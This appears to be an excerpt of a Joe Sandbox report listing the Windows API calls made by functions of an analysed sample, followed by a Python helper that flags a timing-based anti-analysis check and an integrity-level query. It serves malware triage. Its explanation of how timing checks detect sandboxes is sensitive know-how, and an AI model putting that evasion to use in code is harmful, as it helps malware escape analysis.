• Instruction ID: 4f664678f92df36ad7ec1e945e556682fe163b24dc6ca31ef2775bfff4d1583a
• Opcode Fuzzy Hash: 9c455d8ae16d258201c09eb68aaddfcd3fb392ffb74858b285be9cee4a75508a
• Instruction Fuzzy Hash: B8317E311083099BD304EF65D891ABABBF8FF99354F50082DF986C61A1EB719A49CB53
APIs
  • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
• GetCursorPos.USER32(?), ref: 0097C4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0092B9AB,?,?,?,?,?), ref: 0097C4E7
• GetCursorPos.USER32(?), ref: 0097C534
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0092B9AB,?,?,?), ref: 0097C56E
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: 1e9d1ec3a6c748b8d54abe46973950f9f290ef4dd6180c975b678412526c6fe4
• Instruction ID: 28cb41f6aa063532e9b5462e9170065b41c7bb4b7be760ef3575e774c602d233
• Opcode Fuzzy Hash: 1e9d1ec3a6c748b8d54abe46973950f9f290ef4dd6180c975b678412526c6fe4
• Instruction Fuzzy Hash: 1831B676604018EFCB15CF58D858EFA7BBAFB09310F448169F9099B261C732AD50EFA4
                                                                  APIs
                                                                    • Part of subcall function 0094810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00948121
                                                                    • Part of subcall function 0094810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0094812B
                                                                    • Part of subcall function 0094810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0094813A
                                                                    • Part of subcall function 0094810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00948141
                                                                    • Part of subcall function 0094810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00948157
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009486A3
                                                                  • _memcmp.LIBCMT ref: 009486C6
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009486FC
                                                                  • HeapFree.KERNEL32(00000000), ref: 00948703
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                  • String ID:
                                                                  • API String ID: 1592001646-0
                                                                  • Opcode ID: aa6fde51a13824205336137d6967175d6ae3f2de5d1e8fb0f2137fe1602b177e
                                                                  • Instruction ID: 9ac6f79721a8d446ea7da3f04f7f2d6710fb92affe1cd2f6caf21a72c316bede
                                                                  • Opcode Fuzzy Hash: aa6fde51a13824205336137d6967175d6ae3f2de5d1e8fb0f2137fe1602b177e
                                                                  • Instruction Fuzzy Hash: 0621AC32E04109EFDB00DFA4C948FEEB7B9EF84304F164059E904AB240EB30AE45CBA4
                                                                  APIs
                                                                  • __setmode.LIBCMT ref: 009109AE
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00957896,?,?,00000000), ref: 008F5A2C
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00957896,?,?,00000000,?,?), ref: 008F5A50
                                                                  • _fprintf.LIBCMT ref: 009109E5
                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00945DBB
                                                                    • Part of subcall function 00914AAA: _flsall.LIBCMT ref: 00914AC3
                                                                  • __setmode.LIBCMT ref: 00910A1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                  • String ID:
                                                                  • API String ID: 521402451-0
                                                                  • Opcode ID: 62ff9dc6abf44d6b39d30748098c8e1bf9de90ddcc545087b7da6a0edb9b3faa
                                                                  • Instruction ID: e8800ba181bdad75ef2328f8f9a6d322b12877445fd4adb3ccdbd5f4cd141f5a
                                                                  • Opcode Fuzzy Hash: 62ff9dc6abf44d6b39d30748098c8e1bf9de90ddcc545087b7da6a0edb9b3faa
                                                                  • Instruction Fuzzy Hash: D1112731B0460C6FD704B2B89C46AFE7B6CEFC9320F200165F209A7182EE715CD697A1
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009617A3
                                                                    • Part of subcall function 0096182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0096184C
                                                                    • Part of subcall function 0096182D: InternetCloseHandle.WININET(00000000), ref: 009618E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  • Opcode ID: 6f58e729a2698ec4548e50e0f33142e22b318c284173e21352f5fd5b506eae07
                                                                  • Instruction ID: 3a530e7383692027837b2a4ea130f840af58ca11e431c641fd9e8642d0f05c17
                                                                  • Opcode Fuzzy Hash: 6f58e729a2698ec4548e50e0f33142e22b318c284173e21352f5fd5b506eae07
                                                                  • Instruction Fuzzy Hash: D821F332204601BFEB169F60CC01FBABBEDFF88711F18442AFA1597650DB75D810A7A0
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,0097FAC0), ref: 00953A64
                                                                  • GetLastError.KERNEL32 ref: 00953A73
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00953A82
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0097FAC0), ref: 00953ADF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 2267087916-0
                                                                  • Opcode ID: 9f88545f5c333d8665a9e2de844fe3398b8bf66014b8aa4585b79448159c65cb
                                                                  • Instruction ID: a43256f6ab6a7cc96c5abeccf4eed7037742721e3e769fedb1070c0b0920043b
                                                                  • Opcode Fuzzy Hash: 9f88545f5c333d8665a9e2de844fe3398b8bf66014b8aa4585b79448159c65cb
                                                                  • Instruction Fuzzy Hash: 2021A3355082059F8700EF39C89186BBBE8FF553A5F108A2DF899D72A2D731DE49CB52
                                                                  APIs
                                                                    • Part of subcall function 0094F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0094DCD3,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?), ref: 0094F0CB
                                                                    • Part of subcall function 0094F0BC: lstrcpyW.KERNEL32(00000000,?,?,0094DCD3,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094F0F1
                                                                    • Part of subcall function 0094F0BC: lstrcmpiW.KERNEL32(00000000,?,0094DCD3,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?), ref: 0094F122
                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094DCEC
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094DD12
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094DD46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: 4cc84242a2a311ba52dc4328cb541a14ab76677472196c39b09b3d6dbd99ce78
                                                                  • Instruction ID: d38b720ceac68f900ccb84359dc6cd56e9c1371727dbcebbc2fc75b92bb843da
                                                                  • Opcode Fuzzy Hash: 4cc84242a2a311ba52dc4328cb541a14ab76677472196c39b09b3d6dbd99ce78
                                                                  • Instruction Fuzzy Hash: 77118E3A205305EFCB259F74DC55E7A77A9FF86350B40802AE806CB2A0EB719891D791
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00925101
                                                                    • Part of subcall function 0091571C: __FF_MSGBANNER.LIBCMT ref: 00915733
                                                                    • Part of subcall function 0091571C: __NMSG_WRITE.LIBCMT ref: 0091573A
                                                                    • Part of subcall function 0091571C: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,00000000,?,?,?,00910DD3,?), ref: 0091575F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: ad7bb13a85fc1a8b12c79a6543fd50caf085a63387ce8d69bf0c8bc85b9ad8a1
                                                                  • Instruction ID: 227269eec80cd3c763243bd46728e4c9a3483c3c40cf92af08097385c876211b
                                                                  • Opcode Fuzzy Hash: ad7bb13a85fc1a8b12c79a6543fd50caf085a63387ce8d69bf0c8bc85b9ad8a1
                                                                  • Instruction Fuzzy Hash: EF110AB265CA29AFCF312F70FC457AE379C5F403A1B124929F908DA156DE34C890A790
                                                                  APIs
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00957896,?,?,00000000), ref: 008F5A2C
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00957896,?,?,00000000,?,?), ref: 008F5A50
                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00966399
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009663A4
                                                                  • _memmove.LIBCMT ref: 009663D1
                                                                  • inet_ntoa.WSOCK32(?), ref: 009663DC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 1504782959-0
                                                                  • Opcode ID: 5191dfdedd3a2950bd8cc673e896c89aa4756980388937406ce34f94f4a32a37
                                                                  • Instruction ID: 3df71f5a6ff3e8c5d73505cb201ed4fcf399fc17052312940710c07fcdf41906
                                                                  • Opcode Fuzzy Hash: 5191dfdedd3a2950bd8cc673e896c89aa4756980388937406ce34f94f4a32a37
                                                                  • Instruction Fuzzy Hash: 96114C32500109AFCB04EBA8D956DFEBBB8FF48310B144065F60AE7261DB31AE14DB62
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00948B61
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00948B73
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00948B89
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00948BA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 3db7f1171ab505357b0148e77acb340bb9bbfa4854fed82a06826ec9dc835770
                                                                  • Instruction ID: a5ef8370088344105935f19bd46e5e3c9161dae38421451ffa79c56104d3e17b
                                                                  • Opcode Fuzzy Hash: 3db7f1171ab505357b0148e77acb340bb9bbfa4854fed82a06826ec9dc835770
                                                                  • Instruction Fuzzy Hash: A5115E79900218FFDB10DF95CC84FAEBB78FB48710F2040A5E900B7250DA716E10DB94
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 008F12D8
                                                                  • GetClientRect.USER32(?,?), ref: 0092B5FB
                                                                  • GetCursorPos.USER32(?), ref: 0092B605
                                                                  • ScreenToClient.USER32(?,?), ref: 0092B610
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  • Opcode ID: b5d6629962b0fa7492cac7e2cdfb3444a215f048d542d0e19603d68343c747db
                                                                  • Instruction ID: ecfa41ce4bf7681a880afff197b9d6c13b7592ff9978fbe319ffefe87156d09a
                                                                  • Opcode Fuzzy Hash: b5d6629962b0fa7492cac7e2cdfb3444a215f048d542d0e19603d68343c747db
                                                                  • Instruction Fuzzy Hash: BD112536A1411DEFCF10EFA8D8899FE77B8FB05310F400456FA05E7240C730AA919BA6
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 0095115F
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 00951184
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 0095118E
                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 009511C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: 9f1780ecda147ff8e623db9489a7d90f864489b9474f0c53ab46a21a2fc9fdae
                                                                  • Instruction ID: 2870d6afe32912a13f84e8b8c8e6fa8cf258e8bc069962579e82427ec152a477
                                                                  • Opcode Fuzzy Hash: 9f1780ecda147ff8e623db9489a7d90f864489b9474f0c53ab46a21a2fc9fdae
                                                                  • Instruction Fuzzy Hash: F4113632D0891DEBCF00DFA6D888BEEBB78BB49712F404495EA45B6240CA709594DBA1
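                                                                  The two call sequences worth pulling out of listings like the ones above are the timing idiom in the function at 0095115F..009511C1 (QueryPerformanceCounter, Sleep, QueryPerformanceCounter) and the TokenIntegrityLevel query reached through subcall 0094810A at 00948121. The Python below is an added triage helper, not Joe Sandbox code: it parses the bullet format the report prints ("Name.MODULE(args), ref: ADDR", with the optional "Part of subcall function ADDR:" prefix) into per-function call records and flags both patterns. The sample input is copied from this page's listings; the line format is inferred from them, the helper names are my own, and the timing flag is a heuristic (benchmark code produces the same pair of reads around a Sleep).

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and flag
two call patterns: a QueryPerformanceCounter / Sleep / QueryPerformanceCounter
timing check and a GetTokenInformation(TokenIntegrityLevel) query.

Added triage helper, not Joe Sandbox code. SAMPLE is copied from the report
listings; the bullet-line format is inferred from those listings."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: two "APIs" blocks in the bullet format the report uses.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 0095115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 00951184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 0095118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 009511C1
APIs
  • Part of subcall function 0094810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00948121
  • Part of subcall function 0094810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0094812B
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009486A3
• _memcmp.LIBCMT ref: 009486C6
• HeapFree.KERNEL32(00000000), ref: 00948703
"""

# One bullet: optional "Part of subcall function ADDR:" prefix, then Name.MODULE,
# an optional argument list (may contain nested parens), and the call site.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                 # address of the call instruction
    subcall: Optional[str]   # callee address when the API is reached indirectly


def parse_api_listing(text: str) -> List[List[Call]]:
    """Start a new function at each "APIs" header and parse the bullets under it.
    Lines that do not match the call format (headers, hashes) are skipped."""
    functions: List[List[Call]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not functions:
            continue
        args = m.group("args")
        functions[-1].append(Call(
            api=m.group("api"),
            module=m.group("module"),
            args=args.split(",") if args else [],
            ref=int(m.group("ref"), 16),
            subcall=m.group("sub"),
        ))
    return functions


def api_names(calls: List[Call]) -> List[str]:
    """Distinct API names of one function (the set the report's API ID summarizes)."""
    return sorted({c.api for c in calls})


def has_timing_check(calls: List[Call]) -> bool:
    """True when the function's own code (subcalls excluded) reads the performance
    counter, sleeps, and reads it again, in address order. Malware uses the delta
    to notice single-stepping or a sandbox that fast-forwards Sleep; treat the
    flag as a lead, not proof."""
    seq = [c.api for c in sorted(calls, key=lambda c: c.ref) if c.subcall is None]
    want = ["QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"]
    i = 0
    for name in seq:
        if i < len(want) and name == want[i]:
            i += 1
    return i == len(want)


def queries_integrity_level(calls: List[Call]) -> bool:
    """True when GetTokenInformation is asked for TokenIntegrityLevel (class 3),
    i.e. the code checks its own integrity level before acting."""
    return any(
        c.api == "GetTokenInformation"
        and any("TokenIntegrityLevel" in a or a == "00000003" for a in c.args)
        for c in calls
    )


if __name__ == "__main__":
    for n, fn in enumerate(parse_api_listing(SAMPLE)):
        print(n, api_names(fn), has_timing_check(fn), queries_integrity_level(fn))
```

                                                                  The helper only extracts the API set per function; it does not reproduce the report's own "API ID" or "API String ID" values, whose derivation the page does not state. Run it over the full "APIs" sections of a report to get a list of functions to open first in the snapshot file.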
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0094D84D
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0094D864
                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0094D879
                                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0094D897
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                  • String ID:
                                                                  • API String ID: 1352324309-0
                                                                  • Opcode ID: 8ec343935a2460950185dee6f7d8916da4b86f1300e50ae84c22c809a6a2c79d
                                                                  • Instruction ID: 0a21cc576eac678620a19f0325a3754015b53a889d30b85cb1c0655193d834f7
                                                                  • Opcode Fuzzy Hash: 8ec343935a2460950185dee6f7d8916da4b86f1300e50ae84c22c809a6a2c79d
                                                                  • Instruction Fuzzy Hash: E7116179606304DBE7308F50DC1DFA3BBBCEF00B00F108969A51AD6650D7B4E549ABA1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction ID: 93b54a3be3f0e69a53899e2bbe2c1afd28b0c1e686e26ef395a09015635717bd
                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction Fuzzy Hash: 42018C3208815ABBCF125FC4EC02CEE7F66BB18350F488415FE1868034C236C9B5AB91
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0097B2E4
